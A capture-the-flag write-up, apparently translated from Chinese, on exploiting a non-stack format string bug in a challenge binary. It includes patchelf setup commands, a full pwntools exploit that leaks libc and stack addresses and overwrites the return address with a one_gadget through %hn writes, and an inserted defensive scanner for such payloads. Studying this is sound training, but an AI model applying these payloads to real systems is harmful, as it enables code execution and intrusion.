springboard

Local environment debugging

I never used to understand why some challenges ship several extra files; now I know they are there to make it easy to match the local environment to the remote one.

This needs the patchelf tool.

Changing the loader (ld)

patchelf --set-interpreter ./ld.so ./pwn

./ld.so is the loader to set and ./pwn is the local binary; give the path and file name of each.

Changing libc

patchelf --replace-needed libc.so.6 ./libc.so.6 ./pwn

Approach

Checks

[Figure 1]

[Figure 2]

This shows a format string vulnerability in which the format buffer is not on the stack (a non-stack format string bug).

Going to the printf call

[Figure 3]

We can see the following:

Position 1 can be used to leak libc, and it is also where the return address lives.

The two positions marked 2 form a pointer chain that can be used to write to an address of our choosing.

For the details of hand-crafting the format string, see here: 格式化字符串 (Format Strings) | 鱼非愚 (yufeiyu33.github.io)
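As an added example (not part of the original write-up), here is a small Python scanner a defender could run over logged inputs to the keyword prompt: it parses printf-style conversions and flags positional leaks such as `%9$p` and `%hn`/`%hhn` writes of the shape used in this challenge. The regex and `classify_input` are my own; the sample strings in the comments are the payload shapes from the exploit below.

```python
import re

# One printf-style conversion specification: optional positional "N$",
# flags, width, precision, length modifier and the conversion character.
CONVERSION = re.compile(
    r"%(?P<pos>\d+\$)?(?P<flags>[-+ #0]*)(?P<width>\d+|\*)?"
    r"(?:\.(?P<prec>\d+|\*))?(?P<length>hh|h|ll|l|j|z|t|L)?"
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"
)

# Bytes stored by %n for each length modifier (None = plain int).
N_SIZE = {"hh": 1, "h": 2, None: 4, "l": 8, "ll": 8}


def classify_input(text):
    """Scan untrusted text as if printf were given it as the format string.

    Returns {"verdict", "leaks", "writes"}: every %n is a write of the
    running character count to the argument it names (e.g. "%49776c%11$hn"
    stores 49776 as 2 bytes via argument 11); every other conversion reads
    an argument and is reported as a leak when positional or %p/%s/%x
    (e.g. "%9$p-%11$p").
    """
    leaks, writes = [], []
    printed = 0   # lower bound on characters printf would have emitted so far
    last = 0
    for m in CONVERSION.finditer(text):
        printed += m.start() - last          # literal text before this %
        last = m.end()
        conv = m.group("conv")
        if conv == "%":                      # "%%" prints one literal percent
            printed += 1
            continue
        pos = int(m.group("pos")[:-1]) if m.group("pos") else None
        width = m.group("width")
        width = int(width) if width and width != "*" else 0
        if conv == "n":
            size = N_SIZE.get(m.group("length"), 8)  # j/z/t are 8 on amd64
            writes.append({"arg": pos, "bytes": size, "value": printed})
        else:
            printed += max(width, 1)         # "%Nc" prints exactly N chars
            if pos is not None or conv in "pxXs":
                leaks.append({"arg": pos, "conv": conv})
    verdict = "write" if writes else ("leak" if leaks else "benign")
    return {"verdict": verdict, "leaks": leaks, "writes": writes}
```

The "value" field reconstructs what the `%n` family would store, so a log review can tell a two-byte `%hn` write from a one-byte `%hhn` write without re-running the binary.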

exp

from pwn import *
from ctypes import *

s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
#context.terminal = ['gnome-terminal','-x','sh','-c']
context(os='linux',arch='amd64',log_level='debug')
#p=remote('node5.buuoj.cn',25630)
p=process('./pwn')
elf = ELF('./pwn')
libc = ELF('libc.so.6')

def duan():
    # breakpoint helper: attach gdb and wait
    gdb.attach(p)
    pause()

ru('Please enter a keyword\n')
#duan()
# leak a libc address (offset 9, position 1) and a stack address (offset 11) in one go
sl('%9$p-%11$p')
ru('0x')
libc_leak=int(r(12),16)
libc_base=libc_leak-libc.sym['__libc_start_main']-240#remote 240
leak('libc_leak',libc_leak)
leak('libc_base ',libc_base)

ru('-0x')
stack=int(r(12),16)
leak('stack ',stack)
stack1=stack-224   # target address derived from the leaked stack pointer
leak('stack1 ',stack1)
leak('stack1&0xffff ',stack1&0xffff)
ogs=[0x45226,0x4527a,0xf03a4,0xf1247]   # one_gadget offsets for this libc
og=libc_base+ogs[0]
leak('og',og)

leak('og&0xffff',og&0xffff)
leak('(og>>16)&0xff',(og>>16)&0xff)
duan()
# pointer chain (the two positions marked 2): offset 11 points at offset 37,
# so writing through 11 chooses the address and writing through 37 fills it
sla('Please enter a keyword','%'+str(stack1&0xffff)+'c%11$hn')


pause()
sla('Please enter a keyword','%'+str(og&0xffff)+'c%37$hn')
sla('Please enter a keyword','%'+str((stack1+2)&0xffff)+'c%11$hn')
sla('Please enter a keyword','%'+str((og>>16)&0xff)+'c%37$hhn')
'''
sla('Please enter a keyword','%'+str(stack1&0xffff)+'c%11$hn')
sla('Please enter a keyword','%'+str(og&0xffff)+'c%37$hn')
sla('Please enter a keyword','%'+str((stack1+2)&0xffff)+'c%11$hn')
sla('Please enter a keyword','%'+str((og>>16)&0xff)+'c%37$hhn')


'''

itr()